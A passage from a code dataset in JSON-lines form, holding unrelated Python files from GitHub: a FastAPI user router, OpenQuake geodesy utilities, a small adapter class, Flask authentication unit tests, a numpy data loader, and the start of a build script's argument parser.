print(B.longestPalindrome(A))\n","repo_name":"srajsonu/LeetCode-Solutions-Python","sub_path":"Amazon/5. Longest Palindromic Substring.py","file_name":"5. Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18649137120","text":"from fastapi import Response, status, HTTPException, Depends, APIRouter\nfrom .. import models, schemas, utils, oauth2\nfrom sqlalchemy.orm import Session\nfrom ..database import get_db\nfrom typing import List\n\nrouter = APIRouter(prefix=\"/user\", tags=[\"Users\"])\n\n\n@router.get(\n \"/get_all\",\n status_code=status.HTTP_200_OK,\n response_model=List[schemas.UserOut],\n)\nasync def get_users(db: Session = Depends(get_db),\n current_user: int = Depends(oauth2.get_current_user)\n ):\n users = db.query(models.User).all()\n return users\n\n\n@router.get(\"/get\", status_code=status.HTTP_200_OK, response_model=schemas.UserOut)\nasync def get_user(id: int, db: Session = Depends(get_db),\n current_user: int = Depends(oauth2.get_current_user)\n \n ):\n user = db.query(models.User).filter(models.User.id == id).first()\n if not user:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"User with id {id} does not exits\",\n )\n return user\n\n\n@router.post(\"/create\", status_code=status.HTTP_201_CREATED, response_model=schemas.UserOut)\nasync def create_user(\n user: schemas.UserIn,\n db: Session = Depends(get_db),\n admin: str = Depends(oauth2.verify_admin),\n):\n hashed_password = utils.hash_password(user.password)\n user.password = hashed_password\n new_user = models.User(**user.dict())\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n@router.delete(\"/delete\", status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_user(\n id: int,\n db: Session = Depends(get_db),\n admin: str = Depends(oauth2.verify_admin),\n):\n user_query = db.query(models.User).filter(models.User.id == id)\n user = user_query.first()\n if user == None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"user with id: {id} does not exist\")\n\n user_query.delete(synchronize_session=False)\n db.commit()\n 
return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"ajordanb/fastapi-pg-template","sub_path":"app/routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5108836581","text":"import math\nimport logging\nimport operator\nimport collections\n\nimport numpy\nfrom scipy.spatial import cKDTree\nimport shapely.geometry\n\nfrom openquake.hazardlib.geo import geodetic\nfrom openquake.baselib.slots import with_slots\n\nU32 = numpy.uint32\nKM_TO_DEGREES = 0.0089932 # 1 degree == 111 km\nDEGREES_TO_RAD = 0.01745329252 # 1 radians = 57.295779513 degrees\nEARTH_RADIUS = geodetic.EARTH_RADIUS\nspherical_to_cartesian = geodetic.spherical_to_cartesian\nSphericalBB = collections.namedtuple('SphericalBB', 'west east north south')\n\n\ndef angular_distance(km, lat, lat2=None):\n \"\"\"\n Return the angular distance of two points at the given latitude.\n\n >>> '%.3f' % angular_distance(100, lat=40)\n '1.174'\n >>> '%.3f' % angular_distance(100, lat=80)\n '5.179'\n \"\"\"\n if lat2 is not None:\n # use the largest latitude to compute the angular distance\n lat = max(abs(lat), abs(lat2))\n return km * KM_TO_DEGREES / math.cos(lat * DEGREES_TO_RAD)\n\n\nclass SiteAssociationError(Exception):\n \"\"\"Raised when there are no sites close enough\"\"\"\n\n\nclass _GeographicObjects(object):\n \"\"\"\n Store a collection of geographic objects, i.e. objects with lons, lats.\n It is possible to extract the closest object to a given location by\n calling the method .get_closest(lon, lat).\n \"\"\"\n def __init__(self, objects):\n self.objects = objects\n if hasattr(objects, 'lons'):\n lons = objects.lons\n lats = objects.lats\n depths = objects.depths\n elif isinstance(objects, numpy.ndarray):\n lons = objects['lon']\n lats = objects['lat']\n try:\n depths = objects['depth']\n except ValueError: # no field of name depth\n depths = numpy.zeros_like(lons)\n self.kdtree = cKDTree(spherical_to_cartesian(lons, lats, depths))\n\n def get_closest(self, lon, lat, depth=0):\n \"\"\"\n Get the closest object to the given longitude and latitude\n and its distance.\n\n :param lon: longitude in degrees\n :param lat: latitude in degrees\n :param depth: depth in km (default 0)\n :returns: (object, distance)\n \"\"\"\n xyz = spherical_to_cartesian(lon, lat, depth)\n min_dist, idx = self.kdtree.query(xyz)\n return self.objects[idx], min_dist\n\n def assoc(self, sitecol, assoc_dist, mode):\n \"\"\"\n :param sitecol: a (filtered) site collection\n :param assoc_dist: the maximum distance for association\n :param mode: 'strict', 'warn' or 'filter'\n :returns: (filtered site collection, filtered objects)\n \"\"\"\n assert mode in 'strict warn filter', mode\n dic = {}\n for sid, lon, lat in zip(sitecol.sids, sitecol.lons, sitecol.lats):\n obj, distance = self.get_closest(lon, lat)\n if assoc_dist is None:\n dic[sid] = obj # associate all\n elif distance <= assoc_dist:\n dic[sid] = obj # associate within\n elif mode == 'warn':\n dic[sid] = obj # associate outside\n logging.warn('Association to %d km from site (%s %s)',\n int(distance), lon, lat)\n elif mode == 'filter':\n pass # do not associate\n elif mode == 'strict':\n raise SiteAssociationError(\n 'There is nothing closer than %s km '\n 'to site (%s %s)' % (assoc_dist, lon, lat))\n if not dic:\n raise SiteAssociationError(\n 'No sites could be associated within %s km' % assoc_dist)\n return (sitecol.filtered(dic),\n numpy.array([dic[sid] 
for sid in sorted(dic)]))\n\n def assoc2(self, assets_by_site, assoc_dist, mode):\n \"\"\"\n Associated a list of assets by site to the site collection used\n to instantiate GeographicObjects.\n\n :param assets_by_sites: a list of lists of assets\n :param assoc_dist: the maximum distance for association\n :param mode: 'strict', 'warn' or 'filter'\n :returns: (filtered site collection, filtered assets by site)\n \"\"\"\n assert mode in 'strict warn filter', mode\n self.objects.filtered # self.objects must be a SiteCollection\n assets_by_sid = collections.defaultdict(list)\n for assets in assets_by_site:\n lon, lat = assets[0].location\n obj, distance = self.get_closest(lon, lat)\n if distance <= assoc_dist:\n # keep the assets, otherwise discard them\n assets_by_sid[obj['sids']].extend(assets)\n elif mode == 'strict':\n raise SiteAssociationError(\n 'There is nothing closer than %s km '\n 'to site (%s %s)' % (assoc_dist, lon, lat))\n elif mode == 'warn':\n logging.warn('Discarding %s, lon=%.5f, lat=%.5f',\n assets, lon, lat)\n sids = sorted(assets_by_sid)\n if not sids:\n raise SiteAssociationError(\n 'Could not associate any site to any assets within the '\n 'asset_hazard_distance of %s km' % assoc_dist)\n assets_by_site = [\n sorted(assets_by_sid[sid], key=operator.attrgetter('ordinal'))\n for sid in sids]\n return self.objects.filtered(sids), assets_by_site\n\n\ndef assoc(objects, sitecol, assoc_dist, mode):\n \"\"\"\n Associate geographic objects to a site collection.\n\n :param objects:\n something with .lons, .lats or ['lon'] ['lat'], or a list of lists\n of objects with a .location attribute (i.e. assets_by_site)\n :param assoc_dist:\n the maximum distance for association\n :param mode:\n if 'strict' fail if at least one site is not associated\n if 'error' fail if all sites are not associated\n :returns: (filtered site collection, filtered objects)\n \"\"\"\n if isinstance(objects, numpy.ndarray) or hasattr(objects, 'lons'):\n # objects is a geo array with lon, lat fields or a mesh-like instance\n return _GeographicObjects(objects).assoc(sitecol, assoc_dist, mode)\n else: # objects is the list assets_by_site\n return _GeographicObjects(sitecol).assoc2(objects, assoc_dist, mode)\n\n\ndef clean_points(points):\n \"\"\"\n Given a list of :class:`~openquake.hazardlib.geo.point.Point` objects,\n return a new list with adjacent duplicate points removed.\n \"\"\"\n if not points:\n return points\n\n result = [points[0]]\n for point in points:\n if point != result[-1]:\n result.append(point)\n return result\n\n\ndef line_intersects_itself(lons, lats, closed_shape=False):\n \"\"\"\n Return ``True`` if line of points intersects itself.\n Line with the last point repeating the first one considered\n intersecting itself.\n\n The line is defined by lists (or numpy arrays) of points'\n longitudes and latitudes (depth is not taken into account).\n\n :param closed_shape:\n If ``True`` the line will be checked twice: first time with\n its original shape and second time with the points sequence\n being shifted by one point (the last point becomes first,\n the first turns second and so on). 
This is useful for\n checking that the sequence of points defines a valid\n :class:`~openquake.hazardlib.geo.polygon.Polygon`.\n \"\"\"\n assert len(lons) == len(lats)\n\n if len(lons) <= 3:\n # line can not intersect itself unless there are\n # at least four points\n return False\n\n west, east, north, south = get_spherical_bounding_box(lons, lats)\n proj = OrthographicProjection(west, east, north, south)\n\n xx, yy = proj(lons, lats)\n if not shapely.geometry.LineString(list(zip(xx, yy))).is_simple:\n return True\n\n if closed_shape:\n xx, yy = proj(numpy.roll(lons, 1), numpy.roll(lats, 1))\n if not shapely.geometry.LineString(list(zip(xx, yy))).is_simple:\n return True\n\n return False\n\n\ndef get_longitudinal_extent(lon1, lon2):\n \"\"\"\n Return the distance between two longitude values as an angular measure.\n Parameters represent two longitude values in degrees.\n\n :return:\n Float, the angle between ``lon1`` and ``lon2`` in degrees. Value\n is positive if ``lon2`` is on the east from ``lon1`` and negative\n otherwise. Absolute value of the result doesn't exceed 180 for\n valid parameters values.\n \"\"\"\n return (lon2 - lon1 + 180) % 360 - 180\n\n\ndef get_bounding_box(obj, maxdist):\n \"\"\"\n Return the dilated bounding box of a geometric object\n \"\"\"\n if hasattr(obj, 'get_bounding_box'):\n return obj.get_bounding_box(maxdist)\n bbox = obj.polygon.get_bbox()\n a1 = maxdist * KM_TO_DEGREES\n a2 = angular_distance(maxdist, bbox[1], bbox[3])\n return bbox[0] - a2, bbox[1] - a1, bbox[2] + a2, bbox[3] + a1\n\n\ndef get_spherical_bounding_box(lons, lats):\n \"\"\"\n Given a collection of points find and return the bounding box,\n as a pair of longitudes and a pair of latitudes.\n\n Parameters define longitudes and latitudes of a point collection\n respectively in a form of lists or numpy arrays.\n\n :return:\n A tuple of four items. These items represent western, eastern,\n northern and southern borders of the bounding box respectively.\n Values are floats in decimal degrees.\n :raises ValueError:\n If points collection has the longitudinal extent of more than\n 180 degrees (it is impossible to define a single hemisphere\n bound to poles that would contain the whole collection).\n \"\"\"\n north, south = numpy.max(lats), numpy.min(lats)\n west, east = numpy.min(lons), numpy.max(lons)\n assert (-180 <= west <= 180) and (-180 <= east <= 180), (west, east)\n if get_longitudinal_extent(west, east) < 0:\n # points are lying on both sides of the international date line\n # (meridian 180). the actual west longitude is the lowest positive\n # longitude and east one is the highest negative.\n if hasattr(lons, 'flatten'):\n # fixes test_surface_crossing_international_date_line\n lons = lons.flatten()\n west = min(lon for lon in lons if lon > 0)\n east = max(lon for lon in lons if lon < 0)\n if not all((get_longitudinal_extent(west, lon) >= 0\n and get_longitudinal_extent(lon, east) >= 0)\n for lon in lons):\n raise ValueError('points collection has longitudinal extent '\n 'wider than 180 deg')\n return SphericalBB(west, east, north, south)\n\n\n@with_slots\nclass OrthographicProjection(object):\n \"\"\"\n Callable OrthographicProjection object that can perform both forward\n and reverse projection (converting from longitudes and latitudes to x\n and y values on 2d-space and vice versa). 
The call takes three\n arguments: first two are numpy arrays of longitudes and latitudes *or*\n abscissae and ordinates of points to project and the third one\n is a boolean that allows to choose what operation is requested --\n is it forward or reverse one. ``True`` value given to third\n positional argument (or keyword argument \"reverse\") indicates\n that the projection of points in 2d space back to earth surface\n is needed. The default value for \"reverse\" argument is ``False``,\n which means forward projection (degrees to kilometers).\n\n Raises ``ValueError`` in forward projection\n mode if any of the target points is further than 90 degree\n (along the great circle arc) from the projection center.\n\n Parameters are given as floats, representing decimal degrees (first two\n are longitudes and last two are latitudes). They define a bounding box\n in a spherical coordinates of the collection of points that is about\n to be projected. The center point of the projection (coordinates (0, 0)\n in Cartesian space) is set to the middle point of that bounding box.\n The resulting projection is defined for spherical coordinates that are\n not further from the bounding box center than 90 degree on the great\n circle arc.\n\n The result projection is of type `Orthographic\n `_.\n This projection is prone to distance, area and angle distortions\n everywhere outside of the center point, but still can be used for\n checking shapes: verifying if line intersects itself (like in\n :func:`line_intersects_itself`) or if point is inside of a polygon\n (like in :meth:`openquake.hazardlib.geo.polygon.Polygon.discretize`). It\n can be also used for measuring distance to an extent of around 700\n kilometers (error doesn't exceed 1 km up until then).\n \"\"\"\n _slots_ = ('west east north south lambda0 phi0 '\n 'cos_phi0 sin_phi0 sin_pi_over_4').split()\n\n @classmethod\n def from_lons_lats(cls, lons, lats):\n return cls(*get_spherical_bounding_box(lons, lats))\n\n def __init__(self, west, east, north, south):\n self.west = west\n self.east = east\n self.north = north\n self.south = south\n self.lambda0, self.phi0 = numpy.radians(\n get_middle_point(west, north, east, south))\n self.cos_phi0 = numpy.cos(self.phi0)\n self.sin_phi0 = numpy.sin(self.phi0)\n self.sin_pi_over_4 = (2 ** 0.5) / 2\n\n def __call__(self, lons, lats, reverse=False):\n if not reverse:\n lambdas, phis = numpy.radians(lons), numpy.radians(lats)\n cos_phis = numpy.cos(phis)\n lambdas -= self.lambda0\n # calculate the sine of the distance between projection center\n # and each of the points to project\n sin_dist = numpy.sqrt(\n numpy.sin((self.phi0 - phis) / 2.0) ** 2.0\n + self.cos_phi0 * cos_phis * numpy.sin(lambdas / 2.0) ** 2.0\n )\n if (sin_dist > self.sin_pi_over_4).any():\n raise ValueError('some points are too far from the projection '\n 'center lon=%s lat=%s' %\n (numpy.degrees(self.lambda0),\n numpy.degrees(self.phi0)))\n xx = numpy.cos(phis) * numpy.sin(lambdas)\n yy = (self.cos_phi0 * numpy.sin(phis) - self.sin_phi0 * cos_phis\n * numpy.cos(lambdas))\n return xx * EARTH_RADIUS, yy * EARTH_RADIUS\n else:\n # \"reverse\" mode, arguments are actually abscissae\n # and ordinates in 2d space\n xx, yy = lons / EARTH_RADIUS, lats / EARTH_RADIUS\n cos_c = numpy.sqrt(1 - (xx ** 2 + yy ** 2))\n phis = numpy.arcsin(cos_c * self.sin_phi0 + yy * self.cos_phi0)\n lambdas = numpy.arctan2(\n xx, self.cos_phi0 * cos_c - yy * self.sin_phi0)\n xx = numpy.degrees(self.lambda0 + lambdas)\n yy = numpy.degrees(phis)\n # shift longitudes greater 
than 180 back into the western\n # hemisphere, that is in range [0, -180], and longitudes\n # smaller than -180, to the eastern hemisphere [0, 180]\n idx = xx >= 180.\n xx[idx] = xx[idx] - 360.\n idx = xx <= -180.\n xx[idx] = xx[idx] + 360.\n return xx, yy\n\n\ndef get_middle_point(lon1, lat1, lon2, lat2):\n \"\"\"\n Given two points return the point exactly in the middle lying on the same\n great circle arc.\n\n Parameters are point coordinates in degrees.\n\n :returns:\n Tuple of longitude and latitude of the point in the middle.\n \"\"\"\n if lon1 == lon2 and lat1 == lat2:\n return lon1, lat1\n dist = geodetic.geodetic_distance(lon1, lat1, lon2, lat2)\n azimuth = geodetic.azimuth(lon1, lat1, lon2, lat2)\n return geodetic.point_at(lon1, lat1, azimuth, dist / 2.0)\n\n\ndef cartesian_to_spherical(vectors):\n \"\"\"\n Return the spherical coordinates for coordinates in Cartesian space.\n\n This function does an opposite to :func:`spherical_to_cartesian`.\n\n :param vectors:\n Array of 3d vectors in Cartesian space of shape (..., 3)\n :returns:\n Tuple of three arrays of the same shape as ``vectors`` representing\n longitude (decimal degrees), latitude (decimal degrees) and depth (km)\n in specified order.\n \"\"\"\n rr = numpy.sqrt(numpy.sum(vectors * vectors, axis=-1))\n xx, yy, zz = vectors.T\n lats = numpy.degrees(numpy.arcsin((zz / rr).clip(-1., 1.)))\n lons = numpy.degrees(numpy.arctan2(yy, xx))\n depths = EARTH_RADIUS - rr\n return lons.T, lats.T, depths\n\n\ndef triangle_area(e1, e2, e3):\n \"\"\"\n Get the area of triangle formed by three vectors.\n\n Parameters are three three-dimensional numpy arrays representing\n vectors of triangle's edges in Cartesian space.\n\n :returns:\n Float number, the area of the triangle in squared units of coordinates,\n or numpy array of shape of edges with one dimension less.\n\n Uses Heron formula, see http://mathworld.wolfram.com/HeronsFormula.html.\n \"\"\"\n # calculating edges length\n e1_length = numpy.sqrt(numpy.sum(e1 * e1, axis=-1))\n e2_length = numpy.sqrt(numpy.sum(e2 * e2, axis=-1))\n e3_length = numpy.sqrt(numpy.sum(e3 * e3, axis=-1))\n # calculating half perimeter\n s = (e1_length + e2_length + e3_length) / 2.0\n # applying Heron's formula\n return numpy.sqrt(s * (s - e1_length) * (s - e2_length) * (s - e3_length))\n\n\ndef normalized(vector):\n \"\"\"\n Get unit vector for a given one.\n\n :param vector:\n Numpy vector as coordinates in Cartesian space, or an array of such.\n :returns:\n Numpy array of the same shape and structure where all vectors are\n normalized. That is, each coordinate component is divided by its\n vector's length.\n \"\"\"\n length = numpy.sum(vector * vector, axis=-1)\n length = numpy.sqrt(length.reshape(length.shape + (1, )))\n return vector / length\n\n\ndef point_to_polygon_distance(polygon, pxx, pyy):\n \"\"\"\n Calculate the distance to polygon for each point of the collection\n on the 2d Cartesian plane.\n\n :param polygon:\n Shapely \"Polygon\" geometry object.\n :param pxx:\n List or numpy array of abscissae values of points to calculate\n the distance from.\n :param pyy:\n Same structure as ``pxx``, but with ordinate values.\n :returns:\n Numpy array of distances in units of coordinate system. 
Points\n that lie inside the polygon have zero distance.\n \"\"\"\n pxx = numpy.array(pxx)\n pyy = numpy.array(pyy)\n assert pxx.shape == pyy.shape\n if pxx.ndim == 0:\n pxx = pxx.reshape((1, ))\n pyy = pyy.reshape((1, ))\n result = numpy.array([\n polygon.distance(shapely.geometry.Point(pxx.item(i), pyy.item(i)))\n for i in range(pxx.size)\n ])\n return result.reshape(pxx.shape)\n\n\ndef fix_lon(lon):\n \"\"\"\n :returns: a valid longitude in the range -180 <= lon < 180\n\n >>> fix_lon(11)\n 11\n >>> fix_lon(181)\n -179\n >>> fix_lon(-182)\n 178\n \"\"\"\n return (lon + 180) % 360 - 180\n\n\ndef cross_idl(lon1, lon2, *lons):\n \"\"\"\n Return True if two longitude values define line crossing international date\n line.\n\n >>> cross_idl(-45, 45)\n False\n >>> cross_idl(-180, -179)\n False\n >>> cross_idl(180, 179)\n False\n >>> cross_idl(45, -45)\n False\n >>> cross_idl(0, 0)\n False\n >>> cross_idl(-170, 170)\n True\n >>> cross_idl(170, -170)\n True\n >>> cross_idl(-180, 180)\n True\n \"\"\"\n lons = (lon1, lon2) + lons\n l1, l2 = min(lons), max(lons)\n # a line crosses the international date line if the end positions\n # have different sign and they are more than 180 degrees longitude apart\n return l1 * l2 < 0 and abs(l1 - l2) > 180\n\n\ndef normalize_lons(l1, l2):\n \"\"\"\n An international date line safe way of returning a range of longitudes.\n\n >>> normalize_lons(20, 30) # no IDL within the range\n [(20, 30)]\n >>> normalize_lons(-17, +17) # no IDL within the range\n [(-17, 17)]\n >>> normalize_lons(-178, +179)\n [(-180, -178), (179, 180)]\n >>> normalize_lons(178, -179)\n [(-180, -179), (178, 180)]\n >>> normalize_lons(179, -179)\n [(-180, -179), (179, 180)]\n >>> normalize_lons(177, -176)\n [(-180, -176), (177, 180)]\n \"\"\"\n if l1 > l2: # exchange lons\n l1, l2 = l2, l1\n delta = l2 - l1\n if l1 < 0 and l2 > 0 and delta > 180:\n return [(-180, l1), (l2, 180)]\n elif l1 > 0 and l2 > 180 and delta < 180:\n return [(l1, 180), (-180, l2 - 360)]\n elif l1 < -180 and l2 < 0 and delta < 180:\n return [(l1 + 360, 180), (l2, -180)]\n return [(l1, l2)]\n\n\ndef within(bbox, lonlat_index):\n \"\"\"\n :param bbox: a bounding box in lon, lat\n :param lonlat_index: an rtree index in lon, lat\n :returns: array of indices within the bounding box\n \"\"\"\n lon1, lat1, lon2, lat2 = bbox\n set_ = set()\n for l1, l2 in normalize_lons(lon1, lon2):\n box = (l1, lat1, l2, lat2)\n set_ |= set(lonlat_index.intersection(box))\n return numpy.array(sorted(set_), numpy.uint32)\n\n\ndef plane_fit(points):\n \"\"\"\n This fits an n-dimensional plane to a set of points. See\n http://stackoverflow.com/questions/12299540/plane-fitting-to-4-or-more-xyz-points\n\n :parameter points:\n An instance of :class:~numpy.ndarray. 
The number of columns must be\n equal to three.\n :return:\n A point on the plane and the normal to the plane.\n \"\"\"\n points = numpy.transpose(points)\n points = numpy.reshape(points, (numpy.shape(points)[0], -1))\n assert points.shape[0] < points.shape[1], points.shape\n ctr = points.mean(axis=1)\n x = points - ctr[:, None]\n M = numpy.dot(x, x.T)\n return ctr, numpy.linalg.svd(M)[0][:, -1]\n","repo_name":"GFZ-Centre-for-Early-Warning/shakyground","sub_path":"openquake/hazardlib/geo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74240676084","text":"# Задание по программированию: Создание адаптера для класса\nclass MappingAdapter: # Адаптер к обработчику\n def __init__(self, adaptee):\n self.adaptee = adaptee\n\n def lighten(self, grid):\n self.adaptee.set_dim([len(grid[0]), len(grid)])\n self.adaptee.set_lights(\n (j, i)\n for i in range(0, len(grid))\n for j in range(len(grid[i]))\n if grid[i][j] == 1\n )\n self.adaptee.set_obstacles(\n (j, i)\n for i in range(0, len(grid))\n for j in range(len(grid[i]))\n if grid[i][j] == -1\n )\n return self.adaptee.generate_lights()\n","repo_name":"filivan/python-specialization","sub_path":"C2W3E2.py","file_name":"C2W3E2.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5383496196","text":"# ! /api/tests/auth_endpoint/test_auth.py\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the auth endpoint\nContains basic tests for registration, login and logout\n\"\"\"\n\nimport json\nimport unittest\nfrom flask_jwt_extended import (create_access_token)\nfrom api.tests.conftest import BaseTestCase\n\n\ndef register_user(self, first_name, last_name, email, password):\n \"\"\"Register user method\"\"\"\n return self.client.post(\n '/api/v1/users/register',\n data=json.dumps(dict(\n first_name=first_name,\n last_name=last_name,\n email=email,\n password=password\n )),\n content_type='application/json',\n )\n\n\ndef login_user(self, email, password):\n \"\"\"Login user method\"\"\"\n return self.client.post(\n '/api/v1/users/login',\n data=json.dumps(dict(\n email=email,\n password=password\n )),\n content_type='application/json',\n )\n\n\nclass TestAuthEndpoint(BaseTestCase):\n \"\"\"Class that handles Auth Endpoint test\"\"\"\n\n # Registration tests\n def test_successful_registration(self):\n \"\"\" Test for user registration \"\"\"\n with self.client:\n response = register_user(\n self, 'Random', 'User', 'random@user.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] ==\n \"Account for 'random@user.com' has been created.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 201)\n\n def test_no_post_data_registration(self):\n \"\"\" Test empty dictionary \"\"\"\n with self.client:\n input_data = {}\n response = self.client.post('/api/v1/users/register',\n data=json.dumps(input_data),\n content_type=\"application/json\")\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'No input data provided.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_existing_user_registration(self):\n \"\"\"Test if an already existing user tries to 
register\"\"\"\n register_user(self, 'Some', 'Name', 'another@gmail.com', 'aaaAAA111')\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(\n data['message'] ==\n \"Sorry, email 'another@gmail.com' already exists.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_empty_fields(self):\n \"\"\"Test user has empty fields\"\"\"\n with self.client:\n response = register_user(\n self, '', '', '', '')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_invalid_email(self):\n \"\"\"Test if user enters the wrong email\"\"\"\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'anothergmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_password_strength(self):\n \"\"\"Test if user enters strong password\"\"\"\n with self.client:\n response = register_user(\n self, 'Dalin', 'Oluoch', 'anothergmail.com', 'asdfasdf')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n # Login Tests\n def test_registered_user_login(self):\n \"\"\" Test for login of registered-user login \"\"\"\n # register a user\n register_user(self, 'some', 'name', 'another@gmail.com', 'aaaAAA111')\n\n # test logging in registered user\n with self.client:\n response = login_user(self, 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] == 'Successfully logged in.')\n self.assertTrue(data['token'])\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 200)\n\n def test_unregistered_user_login(self):\n \"\"\" Test for login of a not registered-user\"\"\"\n with self.client:\n response = login_user(self, 'another@gmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(\n data['message'] ==\n \"Sorry, email 'another@gmail.com' does not exist.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 400)\n\n def test_login_failure(self):\n \"\"\"Wrong login credentials\n\n Wrong password\n \"\"\"\n # register a user\n register_user(self, 'some', 'name', 'the@user.com', 'aaaAAA111')\n\n # test logging in failure of a registered user - wrong password\n with self.client:\n response = login_user(self, 'the@user.com', 'Pa4s283dDI!')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == \"Wrong login credentials.\")\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_invalid_email_login(self):\n \"\"\" Test for invalid 
email while logging in\"\"\"\n with self.client:\n response = login_user(self, 'joegmail.com', 'aaaAAA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n def test_short_password_login(self):\n \"\"\" Test for minimum length password\"\"\"\n with self.client:\n response = login_user(self, 'joe@gmail.com', 'aA111')\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'fail')\n self.assertTrue(data['message'] == 'Validation errors.')\n self.assertTrue(response.content_type == 'application/json')\n self.assertEqual(response.status_code, 422)\n\n # Test logout\n def test_successful_logout(self):\n \"\"\" Test logout headers token \"\"\"\n with self.client:\n access_token = create_access_token('test@user.com')\n headers = {\n 'Authorization': 'Bearer {}'.format(access_token)\n }\n response = self.client.post(\n '/api/v1/users/logout', headers=headers)\n data = json.loads(response.data.decode())\n self.assertTrue(data['status'] == 'success')\n self.assertTrue(data['message'] ==\n 'You have successfully logged out.')\n self.assertEqual(response.status_code, 200)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"dalaineme/m-tracker","sub_path":"api/tests/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2544276661","text":"#!/usr/bin/python\n#-*-coding:utf-8-*-\nfrom numpy import zeros\n\n__author__ = 'robin'\n#返回的是数据集和标记空间,其中attrnum为属性的数目,标记空间即为文件的最后一列,整个文件有(attrnum+1)列\ndef file2matrix(filename,attrNum):\n fr = open(filename)\n numberOfLines = len(fr.readlines()) #get the number of lines in the file\n dataSet = zeros((numberOfLines,attrNum)) #prepare matrix to return\n labelSpace = [] #prepare labels return\n fr = open(filename)\n index = 0\n for line in fr.readlines():\n line = line.strip()\n listFromLine = line.split('\\t')\n dataSet[index,:] = listFromLine[0:attrNum]\n labelSpace.append(float(listFromLine[-1]))\n index += 1\n return dataSet,labelSpace","repo_name":"robin2017/MachineLearningInAction","sub_path":"robin/util/fileUitl.py","file_name":"fileUitl.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38559675081","text":"#!/usr/bin/python -B\nimport argparse\nimport shutil\nimport os\nimport subprocess\nimport sys\n\nparser = argparse.ArgumentParser(description='Parse the options')\nparser.add_argument('--swig', type=str, dest='swig_location', help='Root location of the swig executable')\nparser.add_argument('--fbxsdk', type=str, dest='fbxsdk_location', help='location of the FBX SDK')\nparser.add_argument('-s', '--stevedore', action='store_true', dest='use_stevedore', help='Use stevedore (used for internal builds)')\nparser.add_argument('-n', '--ninja', action='store_true', dest='use_ninja', help='Generate Ninja build files')\nparser.add_argument('-t', '--build_type', default='Release', dest='build_type', help='Build type to do (Release, Debug, ...)')\nparser.add_argument('-z', '--zap', '-c', '--clean', action='store_true', dest='clean_build', help='Removes the build directory')\nparser.add_argument('-v', '--verbose', action='store_true', dest='verbose_build', help='Make CMake 
